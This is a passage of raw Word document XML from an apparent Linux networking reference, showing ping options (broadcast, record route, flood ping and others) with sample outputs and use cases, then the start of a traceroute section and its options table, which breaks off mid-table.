    <w:p w14:paraId="76E06612" w14:textId="77777777" w:rsidR="001D111D" w:rsidRPr="001D111D" w:rsidRDefault="001D111D" w:rsidP="001D11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D111D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rtt min/avg/max/mdev = 11.2/12.1/13.4/0.5 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F15A476" w14:textId="6814363A" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Stop pinging after 30 seconds regardless of count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5308ED" w14:textId="0899A98A" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Ping broadcast address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A3F92"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b 192.168.1.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB584DA" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Discover active hosts on local network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B67D9C" w14:textId="0A35A846" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Record route ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD780D"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R google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF37545" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Trace packet path through routers (limited to 9 hops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE6C8AF" w14:textId="5E01EA6C" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Audible ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADBBA4"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a google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0442CB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Audio notification for successful pings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8332C5" w14:textId="53310949" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Ping IPv6 address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FA548"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6 2001:4860:4860::8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB47C58" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Test IPv6 connectivity to Google DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701316DB" w14:textId="4793EF4B" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Ping with specific TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760B610"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t 5 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443549DF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Test reachability within specific hop count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5FC37B" w14:textId="74C52937" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Bypass routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB2CDC"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r 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54D254" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Direct interface communication bypassing routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315DBA0" w14:textId="5A92E0FE" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:lastRenderedPageBreak/>
        <w:t>Ping with pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18974D63"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p ff00 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9B687" w14:textId="77777777" w:rsidR="00473DCD" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Test network equipment with specific bit patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8094A5" w14:textId="5B07D7AC" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D37B4D"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PING google.com (142.251.46.142) 1472(1500) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062DE81B"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1480 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=1 ttl=119 time=15.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E10F4"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1480 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=2 ttl=119 time=14.8 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D3381"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1480 bytes from lga25s62-in-f14.1e100.net (142.251.46.142): icmp_seq=3 ttl=119 time=15.1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDA268" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Testing MTU and fragmentation issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C5D53" w14:textId="1025B969" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Flood ping (requires root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365286D" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="00B312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17552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo ping -f -c 100 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2D7295" w14:textId="2B496CE9" w:rsidR="00B56B50" w:rsidRDefault="00B56B50" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0BF486" w14:textId="77777777" w:rsidR="00B56B50" w:rsidRPr="00B56B50" w:rsidRDefault="00B56B50" w:rsidP="00B56B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56B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB071A1" w14:textId="77777777" w:rsidR="00B56B50" w:rsidRPr="00B56B50" w:rsidRDefault="00B56B50" w:rsidP="00B56B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56B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203E2C2" w14:textId="77777777" w:rsidR="00B56B50" w:rsidRPr="00B56B50" w:rsidRDefault="00B56B50" w:rsidP="00B56B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56B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--- 192.168.1.1 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F324D" w14:textId="77777777" w:rsidR="00B56B50" w:rsidRPr="00B56B50" w:rsidRDefault="00B56B50" w:rsidP="00B56B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56B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1000 packets transmitted, 1000 received, 0% packet loss, time 2045ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D97755" w14:textId="77777777" w:rsidR="00B56B50" w:rsidRPr="00B56B50" w:rsidRDefault="00B56B50" w:rsidP="00B56B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56B50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rtt min/avg/max/mdev = 0.234/0.487/1.234/0.156 ms, pipe 2, ipg/ewma 2.047/0.445 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE251FB" w14:textId="7B373A13" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7A65E" w14:textId="77777777" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t>Each dot represents a successful ping response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA4F14B" w14:textId="77777777" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t>1000 packets transmitted: Total packets sent in flood mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142AE566" w14:textId="77777777" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t xml:space="preserve">0% packet loss: Network can handle the stress load. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D1B46" w14:textId="77777777" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t>2045ms: Total time for 1000 packets (very fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B22BAC" w14:textId="77777777" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t xml:space="preserve">pipe 2: Number of packets in flight simultaneously. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C33678" w14:textId="77777777" w:rsidR="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t xml:space="preserve">ipg/ewma: Inter-packet gap and exponentially weighted moving average. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B664E9" w14:textId="6B4247A3" w:rsidR="00677B9A" w:rsidRPr="00677B9A" w:rsidRDefault="00677B9A" w:rsidP="00677B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00677B9A">
        <w:t>Flood mode: Sends packets as fast as possible for stress testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC86F5" w14:textId="5F2072D6" w:rsidR="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Stress testing network performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24416A00" w14:textId="59F0508B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C4522" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>traceroute</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command traces the path packets take to reach a destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C451FF7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E80EE2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Display the route and measure transit delays of packets across an IP network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8FF13B" w14:textId="5C27FECE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C264B75"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options] destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429BE58" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1602"/>
        <w:gridCol w:w="4606"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="357C3492" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2077ECBE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C20666" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0ADE4B81" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F9A3BF"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n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0BC702" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't resolve hostnames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3052946E" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D035B0C"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m max_ttl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54C8A443" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Maximum number of hops (default 30)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="46F9A117" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B14FDA0"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p port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F52CFC6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use specific destination port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4593BF73" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71A5D81A"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q nqueries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02605B1B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Number of queries per hop (default 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="13D0BB2E" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="502471CD"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w waittime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212E99D8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Wait time for response (default 5 seconds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="27A02513" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49A980AB"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s src_addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06B9F95D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use specific source address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="06749F96" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BB1DE6"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g gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3676CBC9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Route through specified gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="53D73133" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="431AEE7F"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i interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B3C5008" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use specified interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="31A48AB0" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="018759C2"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f first_ttl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="408B0DFD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Start from specified TTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6FA13A55" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="106956D6"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r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3434FB80" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Bypass routing tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2C369027" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
